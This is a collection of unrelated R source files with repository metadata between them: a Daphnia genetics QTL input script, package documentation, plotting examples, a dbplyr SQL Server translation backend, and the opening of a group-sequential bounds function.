writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,0,0,0\n1,3,0,1,2\n1,4,0,2,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
con=ped.fn
)
f1s[clone%in%sc[AxCF1Hybrid==1]$clone, id:=3]
f1s[clone%in%sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone, id:=4]
f1s[,fc:="1-2"]
}
write.table(f1s,
file=ped.fn,
quote=FALSE,
row.names=FALSE,
col.names=FALSE,
sep=",",
na="NA",
append=TRUE)
| /AlanAnalysis/rQTL/rabbit.format_input.consensus.dosage.R | no_license | kbkubow/DaphniaPulex20162017Sequencing | R | false | false | 8,502 | r | #module load intel/18.0 intelmpi/18.0 R/3.6.3; R
### makes rabbit input
args = commandArgs(trailingOnly=TRUE)
chr.i <- as.character(args[1])
maxcM <- as.numeric(args[2])
f1s.set <- as.character(args[3])
#chr.i <- "Scaffold_1863_HRSCAF_2081"; maxcM=10; f1s.set <- "all"
### libraries
library(data.table)
library(SeqArray)
library(foreach)
### set wd
setwd("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020")
### load SuperClone
sc <- fread("Superclones201617182019withObtusaandPulicaria_kingcorr_20200623_wmedrd.txt")
### which F1s?
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.onlyPheno.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.allF1s.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.all_AxC_F1s.delim")
if(f1s.set=="onlyPheno_AxC") {
f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==1]$clone
} else if (f1s.set=="wildF1s_AxC"){
f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==0]$clone
} else if(f1s.set=="all_AxC") {
f1s <- sc[AxCF1Hybrid==1]$clone
} else if(f1s.set=="all_CxC") {
f1s <- sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone
} else if(f1s.set=="all") {
f1s <- c(sc[AxCF1Hybrid==1]$clone,
sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone)
}
f1s <- data.table(clone=f1s)
### open GDS
genofile <- seqOpen("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020/MapJune2020_ann.seq.gds", allow.duplicate=TRUE)
### load in filter file
snpFilter <- fread("snpsvarpulexpresentinhalf_table_20200623")
### make snp.dt
snp.dt <- data.table(chr=seqGetData(genofile, "chromosome"),
pos=seqGetData(genofile, "position"),
id=seqGetData(genofile, "variant.id"),
numAlleles=seqNumAllele(genofile),
key="chr")
setkey(snpFilter, chr, pos)
setkey(snp.dt, chr, pos)
snp.dt <- merge(snpFilter, snp.dt)
### make majority rule (consensus) genotype calls for
ac.fd <- foreach(sc.i=c("A", "C"), .combine="cbind")%do%{
seqResetFilter(genofile)
seqSetFilter(genofile, sample.id=sc[SC==sc.i]$clone, variant.id=snp.dt$id)
data.table(af=seqAlleleFreq(genofile, ref.allele=1L)) ### alternate allele
}
setnames(ac.fd, c(1,2), c("af.A", "af.C"))
ac.fd <- cbind(ac.fd, snp.dt)
ac.fd[!is.na(af.A),A.geno := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.C),C.geno := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.A),A.delta := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd[!is.na(af.C),C.delta := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd <- ac.fd[A.delta < 0.05 & C.delta < 0.05]
ac.inform <- ac.fd[(A.geno=="12" & C.geno=="11") |
(A.geno=="12" & C.geno=="22") |
(A.geno=="11" & C.geno=="12") |
(A.geno=="22" & C.geno=="12") |
(A.geno=="12" & C.geno=="12") |
(A.geno=="11" & C.geno=="22") |
(A.geno=="22" & C.geno=="11") ]
ac.inform <- ac.inform[chr==chr.i]
ac.inform[,pos.bin:=round(pos/1e5)]
### select sites in F1s with lowest amount of missing data
seqResetFilter(genofile)
seqSetFilter(genofile,
sample.id=f1s$clone,
variant.id=ac.inform$id)
mr <- data.table(id=seqGetData(genofile, "variant.id"),
mr=seqMissing(genofile))
mr <- merge(mr, snp.dt, by="id")
### check to see if missing rates are homogeneously distributed throughout the genome.
mr[,pos.bin:=round(pos/1e5)]
mr.ag <- mr[,list(nLow=sum(mr<.25), n=length(mr)), list(pos.bin)]
summary(mr.ag$nLow/mr.ag$n)
### trim out position bins with high rates of missing data (i.e., when nLow/n is high. mr=missing rate so a low is good; we want windows with a lot of sites with low missing rates, i.e. with y>.5)
#ggplot(data=mr.ag[nLow/n>.5], aes(y=nLow/n, x=pos.bin)) + geom_line()
### select windows with low rates of high missing rat ( 50% )
setkey(ac.inform, pos.bin)
ac.inform <- ac.inform[J(mr.ag[nLow/n >.5]$pos.bin)]
### trim to sites with low rates of missing data
ac.inform <- merge(ac.inform, mr[,c("id", "mr"), with=F], by="id")
ac.inform <- ac.inform[mr<.25]
### subsample
ac.inform.ag <- ac.inform[,list(n=length(id)), list(pos.bin)]
sample.fun <- function(x, n) {
if(length(x)<=n) return(x)
if(length(x)>n) return(sort(as.integer(sample(as.character(x), size=n))))
}
set.seed(1234)
ac.inform.sub <- ac.inform[,list(id=sample.fun(id, 50000)), list(pos.bin)]
setkey(ac.inform.sub, pos.bin, id)
setkey(ac.inform, pos.bin, id)
ac.inform <- merge(ac.inform, ac.inform.sub)
ac.inform[,list(n=length(id)), list(pos.bin)]
### make parents
A.parent <- c("A", ac.inform$A.geno)
C.parent <- c("C", ac.inform$C.geno)
head(A.parent)
head(C.parent)
parents <- rbind(A.parent, C.parent)
head(parents[,1:10])
### load & format offspring
seqResetFilter(genofile)
seqSetFilter(genofile,
sample.id=f1s$clone,
variant.id=ac.inform$id)
genomat <- as.data.table(t(seqGetData(genofile, "$dosage")))
setnames(genomat, seqGetData(genofile, "sample.id"))
genomat[,id:=seqGetData(genofile, "variant.id")]
### check
genomat.l <- melt(genomat, id.vars="id")
genomat.l.ag <- genomat.l[,list(n22=sum(value==0, na.rm=T), n12=sum(value==1, na.rm=T), n11=sum(value==2, na.rm=T)), list(id)]
gp <- merge(genomat.l.ag, ac.inform, by="id")
offspring <- foreach(ind.i=f1s$clone, .combine="rbind", .errorhandling="remove")%do%{
tmp <- t(as.matrix(genomat[,ind.i, with=F]))
tmp[tmp=="0"] <- "2N"
#tmp[tmp=="1"] <- sample(c("1N","2N"), dim(tmp)[1], replace=T)
tmp[tmp=="1"] <- "12"
tmp[tmp=="2"] <- "1N"
tmp[is.na(tmp)] <- "NN"
cbind(matrix(ind.i, ncol=1), tmp)
}
dim(offspring)
offspring[1:5,1:10]
### make header
marker <- matrix(c("marker", seqGetData(genofile, "variant.id")), nrow=1)
#chr <- matrix(c("chromosome", rep(NA, dim(genomat)[1])), nrow=1)
#pos <- matrix(c("pos(cM)", rep(NA, dim(genomat)[1])), nrow=1)
chr <- matrix(c("chromosome", rep(as.numeric(as.factor(chr.i)), dim(marker)[2]-1)), nrow=1)
pos <- matrix(c("pos(cM)", seq(from=0, to=maxcM, length.out=dim(marker)[2]-1)), nrow=1)
header <- do.call("rbind", list(marker, chr, pos))
### combine
out <- do.call("rbind", list(header, parents, offspring))
rownames(out) <- NULL
out[1:7,1:4]
### write
out.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".all.in", sep="")
writeLines( paste("#founders,",2, sep=""),
con=out.fn
)
options(scipen=999)
write.table(out,
file=out.fn,
quote=FALSE,
row.names=FALSE,
col.names=FALSE,
sep=",",
na="NA",
append=TRUE)
### make ped file
ped.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".ped", sep="")
if(f1s.set!="all") {
writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,2,0,0\n1,3,0,1,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
con=ped.fn
)
f1s[,id:=3]
f1s[,fc:="1-2"]
} else if(f1s.set=="all" ) {
writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,0,0,0\n1,3,0,1,2\n1,4,0,2,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
con=ped.fn
)
f1s[clone%in%sc[AxCF1Hybrid==1]$clone, id:=3]
f1s[clone%in%sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone, id:=4]
f1s[,fc:="1-2"]
}
write.table(f1s,
file=ped.fn,
quote=FALSE,
row.names=FALSE,
col.names=FALSE,
sep=",",
na="NA",
append=TRUE)
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/RcppExports.R
\name{vector_of_matrices}
\alias{vector_of_matrices}
\title{Computes elements S^n until the value size_vec}
\usage{
vector_of_matrices(the_vector, S, size_vec)
}
\arguments{
\item{the_vector}{A vector to save results.}
\item{S}{Sub-intensity matrix.}
\item{size_vec}{Size of vector.}
}
\value{
Modified vector with the elements S^n.
}
\description{
Computes elements S^n until the value size_vec
}
| /man/vector_of_matrices.Rd | permissive | jorgeyslas/phfrailty | R | false | true | 492 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/RcppExports.R
\name{vector_of_matrices}
\alias{vector_of_matrices}
\title{Computes elements S^n until the value size_vec}
\usage{
vector_of_matrices(the_vector, S, size_vec)
}
\arguments{
\item{the_vector}{A vector to save results.}
\item{S}{Sub-intensity matrix.}
\item{size_vec}{Size of vector.}
}
\value{
Modified vector with the elements S^n.
}
\description{
Computes elements S^n until the value size_vec
}
|
library(quantable)
### Name: simpleheatmap
### Title: heatmap2 facade
### Aliases: simpleheatmap
### ** Examples
tmp = matrix(rep((1:100),times = 4) + rnorm(100*4,0,3),ncol=4)
mean = c(20,30,10,40)
sd = c(4,3,4,5)
tmp = sweep(tmp,2,sd,"*")
tmp = sweep(tmp,2,mean,"+")
par(mar=c(5,5,5,5))
simpleheatmap(tmp,ColSideColors=c("red","blue","pink","black"))
simpleheatmap(tmp)
| /data/genthat_extracted_code/quantable/examples/simpleheatmap.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 378 | r | library(quantable)
### Name: simpleheatmap
### Title: heatmap2 facade
### Aliases: simpleheatmap
### ** Examples
tmp = matrix(rep((1:100),times = 4) + rnorm(100*4,0,3),ncol=4)
mean = c(20,30,10,40)
sd = c(4,3,4,5)
tmp = sweep(tmp,2,sd,"*")
tmp = sweep(tmp,2,mean,"+")
par(mar=c(5,5,5,5))
simpleheatmap(tmp,ColSideColors=c("red","blue","pink","black"))
simpleheatmap(tmp)
|
##reading the data from household_power_consumption.txt
DataPower<-read.table("household_power_consumption.txt", sep=";", header = TRUE, na.strings = "?", stringsAsFactors = FALSE, dec = ".")
## subsetting the data to the 1/2/2007 and 2/2/2007 periods
SubData<-DataPower[DataPower$Date %in% c("1/2/2007","2/2/2007"),]
# formatting Data and Time in one variable
DateAndTime<-strptime(paste(SubData$Date,SubData$Time, sep = " "), format="%d/%m/%Y %H:%M:%S")
#opening a graphic device
png("plot2.png", width = 480, height = 480)
#making graph and closing the graphic device
plot(DateAndTime,SubData$Global_active_power, ylab = "Global Active Power (kilowatts)", xlab="", type = "l")
dev.off()
| /plot2.R | no_license | Ig-Gamma/ExData_Plotting1 | R | false | false | 692 | r | ##reading the data from household_power_consumption.txt
DataPower<-read.table("household_power_consumption.txt", sep=";", header = TRUE, na.strings = "?", stringsAsFactors = FALSE, dec = ".")
## subsetting the data to the 1/2/2007 and 2/2/2007 periods
SubData<-DataPower[DataPower$Date %in% c("1/2/2007","2/2/2007"),]
# formatting Data and Time in one variable
DateAndTime<-strptime(paste(SubData$Date,SubData$Time, sep = " "), format="%d/%m/%Y %H:%M:%S")
#opening a graphic device
png("plot2.png", width = 480, height = 480)
#making graph and closing the graphic device
plot(DateAndTime,SubData$Global_active_power, ylab = "Global Active Power (kilowatts)", xlab="", type = "l")
dev.off()
|
\name{GPS}
\alias{GPS}
\docType{data}
\title{
\code{GPS}
}
\description{
WGS84 projection
}
\usage{data(GPS)}
\format{
The format is:
Formal class 'CRS' [package "sp"] with 1 slots
..@ projargs: chr "+init=epsg:4326 +proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs +towgs84=0,0,0"
}
\examples{
data(GPS)
str(GPS)
}
\keyword{datasets}
| /man/GPS.Rd | no_license | cran/geospacom | R | false | false | 344 | rd | \name{GPS}
\alias{GPS}
\docType{data}
\title{
\code{GPS}
}
\description{
WGS84 projection
}
\usage{data(GPS)}
\format{
The format is:
Formal class 'CRS' [package "sp"] with 1 slots
..@ projargs: chr "+init=epsg:4326 +proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs +towgs84=0,0,0"
}
\examples{
data(GPS)
str(GPS)
}
\keyword{datasets}
|
library("ghgvcr")
library("ggplot2")
library("gridExtra")
library("jsonlite")
context("test that plots work without generating errors.")
single_json_file <- "../data/single_site.json"
test_that("plots are generated without errors", {
eco <- fromJSON(single_json_file)
out_json <- calc_ghgv(toJSON(eco, auto_unbox = FALSE))
plot_data <- json_to_df(toJSON(fromJSON(out_json)$results))
p <- plot_ghgv(plot_data)
grid.arrange(p)
expect_is(p, c('gtable', 'grob', 'gDesc'))
})
test_that("sites are ordered correctly", {
})
| /tests/testthat/test_plots.R | permissive | ebimodeling/ghgvcR | R | false | false | 543 | r | library("ghgvcr")
library("ggplot2")
library("gridExtra")
library("jsonlite")
context("test that plots work without generating errors.")
single_json_file <- "../data/single_site.json"
test_that("plots are generated without errors", {
eco <- fromJSON(single_json_file)
out_json <- calc_ghgv(toJSON(eco, auto_unbox = FALSE))
plot_data <- json_to_df(toJSON(fromJSON(out_json)$results))
p <- plot_ghgv(plot_data)
grid.arrange(p)
expect_is(p, c('gtable', 'grob', 'gDesc'))
})
test_that("sites are ordered correctly", {
})
|
#' @export
`sql_select.Microsoft SQL Server`<- function(con, select, from, where = NULL,
group_by = NULL, having = NULL,
order_by = NULL,
limit = NULL,
distinct = FALSE,
...) {
out <- vector("list", 7)
names(out) <- c("select", "from", "where", "group_by",
"having", "order_by","limit")
assert_that(is.character(select), length(select) > 0L)
out$select <- build_sql(
"SELECT ",
if (distinct) sql("DISTINCT "),
# MS SQL uses the TOP statement instead of LIMIT which is what SQL92 uses
# TOP is expected after DISTINCT and not at the end of the query
# e.g: SELECT TOP 100 * FROM my_table
if (!is.null(limit) && !identical(limit, Inf)) {
assert_that(is.numeric(limit), length(limit) == 1L, limit > 0)
build_sql("TOP(", as.integer(limit), ") ", con = con)
},
escape(select, collapse = ", ", con = con),
con = con
)
out$from <- sql_clause_from(from, con)
out$where <- sql_clause_where(where, con)
out$group_by <- sql_clause_group_by(group_by, con)
out$having <- sql_clause_having(having, con)
out$order_by <- sql_clause_order_by(order_by, con)
escape(unname(purrr::compact(out)), collapse = "\n", parens = FALSE, con = con)
}
#' @export
`sql_translate_env.Microsoft SQL Server` <- function(con) {
sql_variant(
sql_translator(.parent = base_odbc_scalar,
`!` = function(x) {
if (sql_current_select()) {
build_sql(sql("~"), list(x))
} else {
sql_expr(NOT(!!x))
}
},
`!=` = sql_infix("!="),
`==` = sql_infix("="),
`<` = sql_infix("<"),
`<=` = sql_infix("<="),
`>` = sql_infix(">"),
`>=` = sql_infix(">="),
`&` = mssql_generic_infix("&", "%AND%"),
`&&` = mssql_generic_infix("&", "%AND%"),
`|` = mssql_generic_infix("|", "%OR%"),
`||` = mssql_generic_infix("|", "%OR%"),
bitwShiftL = sql_not_supported("bitwShiftL"),
bitwShiftR = sql_not_supported("bitwShiftR"),
`if` = mssql_sql_if,
if_else = function(condition, true, false) mssql_sql_if(condition, true, false),
ifelse = function(test, yes, no) mssql_sql_if(test, yes, no),
as.numeric = sql_cast("NUMERIC"),
as.double = sql_cast("NUMERIC"),
as.character = sql_cast("VARCHAR(MAX)"),
log = sql_prefix("LOG"),
nchar = sql_prefix("LEN"),
atan2 = sql_prefix("ATN2"),
ceil = sql_prefix("CEILING"),
ceiling = sql_prefix("CEILING"),
# https://dba.stackexchange.com/questions/187090
pmin = sql_not_supported("pmin()"),
pmax = sql_not_supported("pmax()"),
substr = function(x, start, stop) {
len <- stop - start + 1
sql_expr(SUBSTRING(!!x, !!start, !!len))
},
is.null = function(x) mssql_is_null(x, sql_current_context()),
is.na = function(x) mssql_is_null(x, sql_current_context()),
# TRIM is not supported on MS SQL versions under 2017
# https://docs.microsoft.com/en-us/sql/t-sql/functions/trim-transact-sql
# Best solution is to nest a left and right trims.
trimws = function(x) {
sql_expr(LTRIM(RTRIM(!!x)))
},
# MSSQL supports CONCAT_WS in the CTP version of 2016
paste = sql_not_supported("paste()"),
# stringr functions
str_length = sql_prefix("LEN"),
str_locate = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string))
},
str_detect = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string) > 0L)
}
),
sql_translator(.parent = base_odbc_agg,
sd = sql_aggregate("STDEV", "sd"),
var = sql_aggregate("VAR", "var"),
# MSSQL does not have function for: cor and cov
cor = sql_not_supported("cor()"),
cov = sql_not_supported("cov()")
),
sql_translator(.parent = base_odbc_win,
sd = win_aggregate("STDEV"),
var = win_aggregate("VAR"),
# MSSQL does not have function for: cor and cov
cor = win_absent("cor"),
cov = win_absent("cov")
)
)}
#' @export
`db_analyze.Microsoft SQL Server` <- function(con, table, ...) {
# Using UPDATE STATISTICS instead of ANALYZE as recommended in this article
# https://docs.microsoft.com/en-us/sql/t-sql/statements/update-statistics-transact-sql
sql <- build_sql("UPDATE STATISTICS ", as.sql(table), con = con)
DBI::dbExecute(con, sql)
}
mssql_temp_name <- function(name, temporary){
# check that name has prefixed '##' if temporary
if (temporary && substr(name, 1, 1) != "#") {
name <- paste0("##", name)
message("Created a temporary table named: ", name)
}
name
}
#' @export
`db_save_query.Microsoft SQL Server` <- function(con, sql, name,
temporary = TRUE, ...){
name <- mssql_temp_name(name, temporary)
tt_sql <- build_sql(
"SELECT * INTO ", as.sql(name), " FROM (", sql, ") ", as.sql(name),
con = con
)
dbExecute(con, tt_sql)
name
}
#' @export
`db_write_table.Microsoft SQL Server` <- function(con, table, types, values, temporary = TRUE, ...) {
table <- mssql_temp_name(table, temporary)
dbWriteTable(
con,
name = table,
types = types,
value = values,
temporary = FALSE,
row.names = FALSE
)
table
}
# `IS NULL` returns a boolean expression, so you can't use it in a result set
# the approach using casting return a bit, so you can use in a result set, but not in where.
# Microsoft documentation: The result of a comparison operator has the Boolean data type.
# This has three values: TRUE, FALSE, and UNKNOWN. Expressions that return a Boolean data type are
# known as Boolean expressions. Unlike other SQL Server data types, a Boolean data type cannot
# be specified as the data type of a table column or variable, and cannot be returned in a result set.
# https://docs.microsoft.com/en-us/sql/t-sql/language-elements/comparison-operators-transact-sql
mssql_is_null <- function(x, context) {
if (context$clause %in% c("SELECT", "ORDER")) {
sql_expr(convert(BIT, iif(!!x %is% NULL, 1L, 0L)))
} else {
sql_is_null(x)
}
}
mssql_generic_infix <- function(if_select, if_filter) {
force(if_select)
force(if_filter)
function(x, y) {
if (sql_current_select()) {
f <- if_select
} else {
f <- if_filter
}
sql_call2(f, x, y)
}
}
mssql_sql_if <- function(cond, if_true, if_false = NULL) {
old <- set_current_context(list(clause = ""))
on.exit(set_current_context(old), add = TRUE)
cond <- build_sql(cond)
sql_if(cond, if_true, if_false)
}
globalVariables(c("BIT", "%is%", "convert", "iif", "NOT", "SUBSTRING", "LTRIM", "RTRIM", "CHARINDEX"))
| /R/backend-mssql.R | permissive | machow/dbplyr | R | false | false | 7,594 | r | #' @export
`sql_select.Microsoft SQL Server`<- function(con, select, from, where = NULL,
group_by = NULL, having = NULL,
order_by = NULL,
limit = NULL,
distinct = FALSE,
...) {
out <- vector("list", 7)
names(out) <- c("select", "from", "where", "group_by",
"having", "order_by","limit")
assert_that(is.character(select), length(select) > 0L)
out$select <- build_sql(
"SELECT ",
if (distinct) sql("DISTINCT "),
# MS SQL uses the TOP statement instead of LIMIT which is what SQL92 uses
# TOP is expected after DISTINCT and not at the end of the query
# e.g: SELECT TOP 100 * FROM my_table
if (!is.null(limit) && !identical(limit, Inf)) {
assert_that(is.numeric(limit), length(limit) == 1L, limit > 0)
build_sql("TOP(", as.integer(limit), ") ", con = con)
},
escape(select, collapse = ", ", con = con),
con = con
)
out$from <- sql_clause_from(from, con)
out$where <- sql_clause_where(where, con)
out$group_by <- sql_clause_group_by(group_by, con)
out$having <- sql_clause_having(having, con)
out$order_by <- sql_clause_order_by(order_by, con)
escape(unname(purrr::compact(out)), collapse = "\n", parens = FALSE, con = con)
}
#' @export
`sql_translate_env.Microsoft SQL Server` <- function(con) {
sql_variant(
sql_translator(.parent = base_odbc_scalar,
`!` = function(x) {
if (sql_current_select()) {
build_sql(sql("~"), list(x))
} else {
sql_expr(NOT(!!x))
}
},
`!=` = sql_infix("!="),
`==` = sql_infix("="),
`<` = sql_infix("<"),
`<=` = sql_infix("<="),
`>` = sql_infix(">"),
`>=` = sql_infix(">="),
`&` = mssql_generic_infix("&", "%AND%"),
`&&` = mssql_generic_infix("&", "%AND%"),
`|` = mssql_generic_infix("|", "%OR%"),
`||` = mssql_generic_infix("|", "%OR%"),
bitwShiftL = sql_not_supported("bitwShiftL"),
bitwShiftR = sql_not_supported("bitwShiftR"),
`if` = mssql_sql_if,
if_else = function(condition, true, false) mssql_sql_if(condition, true, false),
ifelse = function(test, yes, no) mssql_sql_if(test, yes, no),
as.numeric = sql_cast("NUMERIC"),
as.double = sql_cast("NUMERIC"),
as.character = sql_cast("VARCHAR(MAX)"),
log = sql_prefix("LOG"),
nchar = sql_prefix("LEN"),
atan2 = sql_prefix("ATN2"),
ceil = sql_prefix("CEILING"),
ceiling = sql_prefix("CEILING"),
# https://dba.stackexchange.com/questions/187090
pmin = sql_not_supported("pmin()"),
pmax = sql_not_supported("pmax()"),
substr = function(x, start, stop) {
len <- stop - start + 1
sql_expr(SUBSTRING(!!x, !!start, !!len))
},
is.null = function(x) mssql_is_null(x, sql_current_context()),
is.na = function(x) mssql_is_null(x, sql_current_context()),
# TRIM is not supported on MS SQL versions under 2017
# https://docs.microsoft.com/en-us/sql/t-sql/functions/trim-transact-sql
# Best solution is to nest a left and right trims.
trimws = function(x) {
sql_expr(LTRIM(RTRIM(!!x)))
},
# MSSQL supports CONCAT_WS in the CTP version of 2016
paste = sql_not_supported("paste()"),
# stringr functions
str_length = sql_prefix("LEN"),
str_locate = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string))
},
str_detect = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string) > 0L)
}
),
sql_translator(.parent = base_odbc_agg,
sd = sql_aggregate("STDEV", "sd"),
var = sql_aggregate("VAR", "var"),
# MSSQL does not have function for: cor and cov
cor = sql_not_supported("cor()"),
cov = sql_not_supported("cov()")
),
sql_translator(.parent = base_odbc_win,
sd = win_aggregate("STDEV"),
var = win_aggregate("VAR"),
# MSSQL does not have function for: cor and cov
cor = win_absent("cor"),
cov = win_absent("cov")
)
)}
#' @export
`db_analyze.Microsoft SQL Server` <- function(con, table, ...) {
# Using UPDATE STATISTICS instead of ANALYZE as recommended in this article
# https://docs.microsoft.com/en-us/sql/t-sql/statements/update-statistics-transact-sql
sql <- build_sql("UPDATE STATISTICS ", as.sql(table), con = con)
DBI::dbExecute(con, sql)
}
mssql_temp_name <- function(name, temporary){
# check that name has prefixed '##' if temporary
if (temporary && substr(name, 1, 1) != "#") {
name <- paste0("##", name)
message("Created a temporary table named: ", name)
}
name
}
#' @export
`db_save_query.Microsoft SQL Server` <- function(con, sql, name,
temporary = TRUE, ...){
name <- mssql_temp_name(name, temporary)
tt_sql <- build_sql(
"SELECT * INTO ", as.sql(name), " FROM (", sql, ") ", as.sql(name),
con = con
)
dbExecute(con, tt_sql)
name
}
#' @export
`db_write_table.Microsoft SQL Server` <- function(con, table, types, values, temporary = TRUE, ...) {
table <- mssql_temp_name(table, temporary)
dbWriteTable(
con,
name = table,
types = types,
value = values,
temporary = FALSE,
row.names = FALSE
)
table
}
# `IS NULL` returns a boolean expression, so you can't use it in a result set
# the approach using casting return a bit, so you can use in a result set, but not in where.
# Microsoft documentation: The result of a comparison operator has the Boolean data type.
# This has three values: TRUE, FALSE, and UNKNOWN. Expressions that return a Boolean data type are
# known as Boolean expressions. Unlike other SQL Server data types, a Boolean data type cannot
# be specified as the data type of a table column or variable, and cannot be returned in a result set.
# https://docs.microsoft.com/en-us/sql/t-sql/language-elements/comparison-operators-transact-sql
mssql_is_null <- function(x, context) {
if (context$clause %in% c("SELECT", "ORDER")) {
sql_expr(convert(BIT, iif(!!x %is% NULL, 1L, 0L)))
} else {
sql_is_null(x)
}
}
mssql_generic_infix <- function(if_select, if_filter) {
force(if_select)
force(if_filter)
function(x, y) {
if (sql_current_select()) {
f <- if_select
} else {
f <- if_filter
}
sql_call2(f, x, y)
}
}
mssql_sql_if <- function(cond, if_true, if_false = NULL) {
old <- set_current_context(list(clause = ""))
on.exit(set_current_context(old), add = TRUE)
cond <- build_sql(cond)
sql_if(cond, if_true, if_false)
}
globalVariables(c("BIT", "%is%", "convert", "iif", "NOT", "SUBSTRING", "LTRIM", "RTRIM", "CHARINDEX"))
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/permanovas.R
\name{permanova_expr}
\alias{permanova_expr}
\title{Permanova}
\usage{
permanova_expr(expr, meta)
}
\arguments{
\item{expr}{Matrix of the expression}
\item{meta}{Data frame with the variables to compare}
}
\value{
An anova.cca object
}
\description{
Permanova
}
| /man/permanova_expr.Rd | permissive | llrs/integration-helper | R | false | true | 354 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/permanovas.R
\name{permanova_expr}
\alias{permanova_expr}
\title{Permanova}
\usage{
permanova_expr(expr, meta)
}
\arguments{
\item{expr}{Matrix of the expression}
\item{meta}{Data frame with the variables to compare}
}
\value{
An anova.cca object
}
\description{
Permanova
}
|
## Program Name: ldbounds.R##
## Package ldbounds.R (unreleased version) ##
"bounds" <-
function(x,t2=x,iuse=1,asf=NULL,alpha=0.05,phi=rep(1,length(alpha)),sides=2,ztrun=rep(8,length(alpha))){
if (!is.numeric(x)){
stop("'x' must be a vector of analysis times or the number of analysis times")
}
if (length(x)==1){
t <- (1:x)/x
if (t2==x){
t2 <- t
}
}
else{
t <- x
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)&(length(iuse) != length(asf))){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (length(asf)==2){
if ({class(asf[[1]])!="function"}|{class(asf[[2]])!="function"}){
stop("Alpha spending function must be of class 'function'.")
}
alpha[1] <- asf[[1]](1)
alpha[2] <- asf[[2]](1)
}
if (length(asf)==1){
if (class(asf)!="function"){
stop("Alpha spending function must be of class 'function'.")
}
alpha <- asf(1)
}
if (sum(iuse==5)<length(asf)){
stop("Can't specify 2 spending functions unless iuse=c(5,5).")
}
if ({sum(iuse==5)>0}&{length(asf)==0}){
stop("If iuse=5, must specify spending function.")
}
if (sum({iuse==3}|{iuse==4}) > length(phi)){
stop("Phi must be specified for each boundary that uses spending function 3 or 4.")
}
if (sum({iuse==3}&{phi <= 0}) > 0){
stop("For power family (iuse=3), phi must be positive.")
}
if (sum({iuse==4}&{phi==0}) > 0){
stop("For Hwang-Shih-DeCani family (iuse=4), phi cannot be 0.")
}
if (length(phi)==1) phi <- rep(phi,2)
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}&{length(asf)!=2}&{ztrun[1]==ztrun[2]}&{{length(phi)==1}|{phi[1]==phi[2]}}}){
if ({length(alpha)==1}&{sides==1}){
type <- 1
alph <- alpha
}
if ({length(alpha)==1}&{sides==2}){
type <- 2
alph <- alpha
}
if (length(alpha)==2){
type <- 2
alph <- 2*alpha[1]
}
ld <- landem(t,t2,sides,iuse[1],asf,alph,phi[1],ztrun[1])
ubnd <- ld$upper.bounds
lbnd <- ld$lower.bounds
epr <- ld$exit.pr
dpr <- ld$diff.pr
spend <- ld$spend
}
else{
type <- 3
